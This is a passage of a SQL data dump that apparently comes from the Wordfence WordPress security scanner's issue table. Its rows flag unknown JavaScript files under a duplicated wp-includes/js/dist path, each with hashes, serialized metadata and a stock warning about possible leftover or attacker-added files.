wp-includes/wp-includes/js/dist/blob.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/dist/blob.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34117,1631564693,1631564693,'new','knownfile',75,'8bcb03a9699cf9329cef9b2d05fcbe8c','b2a0bdd2b1082dd8cedbb056cea676a4','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/blob.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/blob.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34118,1631564693,1631564693,'new','knownfile',75,'556b38ad6abd38769d221333130a5260','fdb51f16c8a4af91c3e0f085b5c3df3b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-directory.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/dist/block-directory.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34119,1631564693,1631564693,'new','knownfile',75,'83c6ad87a36f32f3d21d93c93f4c9703','6965237c9ff5e58a6298015cd88d3e8b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-directory.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:54:\"wp-includes/wp-includes/js/dist/block-directory.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34120,1631564693,1631564693,'new','knownfile',75,'7d10032d4289616ae411672101b9f916','6a14b8f577063e6e47a1f453fdf469d1','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-editor.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/js/dist/block-editor.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34121,1631564693,1631564693,'new','knownfile',75,'968789757a39fe97fa34e4be46212bf9','5c325b69f0c08ec55c739ccb5d452767','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-editor.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/js/dist/block-editor.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34122,1631564693,1631564693,'new','knownfile',75,'cd32be0bf5b60669934a1f97ff60d3fb','7f6f6f04f2a13bd45e46f49684e98fd3','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-library.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/block-library.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34123,1631564693,1631564693,'new','knownfile',75,'2307e3616921b62b490a2ecba0ff9908','a4ef2190ff6571ee4baf74ab6cfa1e59','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-library.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/dist/block-library.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34124,1631564693,1631564693,'new','knownfile',75,'4434c8286d136ca83fe35ba3bcdcfc6d','63c075b3714b76c594b15992f3d7140f','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-serialization-default-parser.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/js/dist/block-serialization-default-parser.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34125,1631564693,1631564693,'new','knownfile',75,'f3c4402582f3e18bef19b4f9def77b83','8822431d83c10d68375fcf27dca1ae3b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/block-serialization-default-parser.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:73:\"wp-includes/wp-includes/js/dist/block-serialization-default-parser.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34126,1631564693,1631564693,'new','knownfile',75,'bc3eee49098f854cac0545d2c2782553','88d310484b1735f97e95dba3b79cda6b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/blocks.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/dist/blocks.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34127,1631564693,1631564693,'new','knownfile',75,'405bef7d8f15efc858d4213557490588','aea8a9af3134180a6dd4ddf84878aa0d','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/blocks.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/dist/blocks.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34128,1631564693,1631564693,'new','knownfile',75,'9581d97c7cbcb4a36662034bfda703cf','053e66933189655f32f9cf615fb601c5','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/components.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/dist/components.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34129,1631564693,1631564693,'new','knownfile',75,'8237375422ab04a4cc4f7bcab8e4e51c','713828c51b5d0e6807c599847b11e45f','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/components.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/dist/components.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34130,1631564693,1631564693,'new','knownfile',75,'2496ed2c0075859d955b9beae7be2b82','93514db8812a23f2526e628fdd044260','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/compose.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/compose.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34131,1631564694,1631564694,'new','knownfile',75,'7916ea9655d68a8b199bd71dfaa0b689','55545ad42a61f5c79099ced9bdafe3fa','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/compose.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/compose.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34132,1631564694,1631564694,'new','knownfile',75,'e9aa41ef07bdc96624bd1cd90c530b4d','8a60229a2a2599429d176c8ab2bd6aca','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/core-data.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/core-data.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34133,1631564694,1631564694,'new','knownfile',75,'40793d5d5edcc8d7c901183a4cf17ea5','dfce9701ec930fb5eb9d368204284469','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/core-data.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/core-data.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34134,1631564694,1631564694,'new','knownfile',75,'a09d4814bffd4cf46e73b7149a4a0db6','70781a603bbb74ed876dd6b419238970','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/data-controls.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/data-controls.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34135,1631564694,1631564694,'new','knownfile',75,'811e184162d526c5836e1c62cbfddb8f','25626874aa4e6d2e82ba218912fd7ac1','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/data-controls.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/js/dist/data-controls.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34136,1631564694,1631564694,'new','knownfile',75,'2e523f1f25b69d991effc154b1dcaacd','c17c05cb35ee5382e384503f9e33b6fb','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/data.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/dist/data.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34137,1631564694,1631564694,'new','knownfile',75,'6a92c3bb7a5f6435bf42c95ef1a59e0a','56693db31b014781e49f23959d88a6da','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/data.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/data.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34138,1631564694,1631564694,'new','knownfile',75,'4e18b0c7e529339cf8157cc8ce2a2d76','07e887305436c7375f14a23e2ee395ba','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/date.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:39:\"wp-includes/wp-includes/js/dist/date.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34139,1631564694,1631564694,'new','knownfile',75,'6b9b0e76e3cbe8dbf6e6698c86f69c9b','fa2431ddd60046804346b4bd1015086f','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/date.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/js/dist/date.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34140,1631564694,1631564694,'new','knownfile',75,'2de47da35d70b7788d2a1b1e0329ce1b','f4b00c30d5dbbe8931ee7e9f2665142c','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/deprecated.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/dist/deprecated.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34141,1631564694,1631564694,'new','knownfile',75,'4e04e3b56f87dcb1aace3178855ce247','affd60633b492e51e7e0bbc415746e36','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/deprecated.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/dist/deprecated.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34142,1631564694,1631564694,'new','knownfile',75,'d4fa27e7d3d59596de0779487d053ba6','0f3d82d4b1a2214ce971a9c5bc092678','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/dom-ready.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/dom-ready.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34143,1631564694,1631564694,'new','knownfile',75,'54c189fd2f71169bf094263a70d968a8','58ceec494bd885d681377d83ee03498f','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/dom-ready.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/dom-ready.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34144,1631564694,1631564694,'new','knownfile',75,'270b6e806d014e423db8a536a6231a28','9f8672503b95389f52ada339b8c16195','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/dom.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:38:\"wp-includes/wp-includes/js/dist/dom.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34145,1631564694,1631564694,'new','knownfile',75,'480862efaac173c94ee508b4961413eb','6a641f11f178e3b26c3113f3aa8660a1','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/dom.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/dom.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34146,1631564694,1631564694,'new','knownfile',75,'75765108bcda4f95443358ee0f91f6df','2f6e06d249199404838243c4b07ca2d3','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/edit-post.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:44:\"wp-includes/wp-includes/js/dist/edit-post.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34147,1631564694,1631564694,'new','knownfile',75,'35fd7bbea6723792a4b5465d92a491b7','4eb5f9fa71eb921ddd4aae6f104d6716','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/edit-post.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:48:\"wp-includes/wp-includes/js/dist/edit-post.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34148,1631564694,1631564694,'new','knownfile',75,'715cb16a39f300a10c9cf5ff1639ff52','d16491d60a2d92c81501dc1063600149','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/editor.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/js/dist/editor.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34149,1631564694,1631564694,'new','knownfile',75,'8869314f6d39e322c587f105f7e5fcb2','b8e1ec6c70179c66d038bcf38ea89494','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/editor.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:45:\"wp-includes/wp-includes/js/dist/editor.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34150,1631564694,1631564694,'new','knownfile',75,'0511835fb36b36eea46c3bf130fc7362','b86f89fb1cecb1fca1fb1c88d35c7a04','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/element.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:42:\"wp-includes/wp-includes/js/dist/element.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34151,1631564694,1631564694,'new','knownfile',75,'bd1999d575649642f9712830cd295991','522d4ac5e742a0c39a6c1529710d267e','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/element.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/element.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34152,1631564694,1631564694,'new','knownfile',75,'8b4d1e19e7ce71af6b5186849d91a022','2789df24d84861993863439998401f20','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/escape-html.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:46:\"wp-includes/wp-includes/js/dist/escape-html.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34153,1631564694,1631564694,'new','knownfile',75,'b64a22f263137018bd5a212d65525f70','2573593b4fa3eff721cfb2cb79732c3b','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/escape-html.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:50:\"wp-includes/wp-includes/js/dist/escape-html.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34154,1631564694,1631564694,'new','knownfile',75,'df40eae986baa2ce1c80c5b75c435455','43bad9056921b810c0c6483fed0df6ce','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/format-library.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:49:\"wp-includes/wp-includes/js/dist/format-library.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34155,1631564694,1631564694,'new','knownfile',75,'0f343f364e804ea9d50a255e791e761c','69df92e1f81948d0a8bfb58796005430','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/format-library.min.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:53:\"wp-includes/wp-includes/js/dist/format-library.min.js\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(34156,1631564695,1631564695,'new','knownfile',75,'1ed6534e29854b9fb6efceed49aa5eea','1dfe1bc878405acf368f4a5efb4a8d62','Unknown file in WordPress core: wp-includes/wp-includes/js/dist/hooks.js','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn 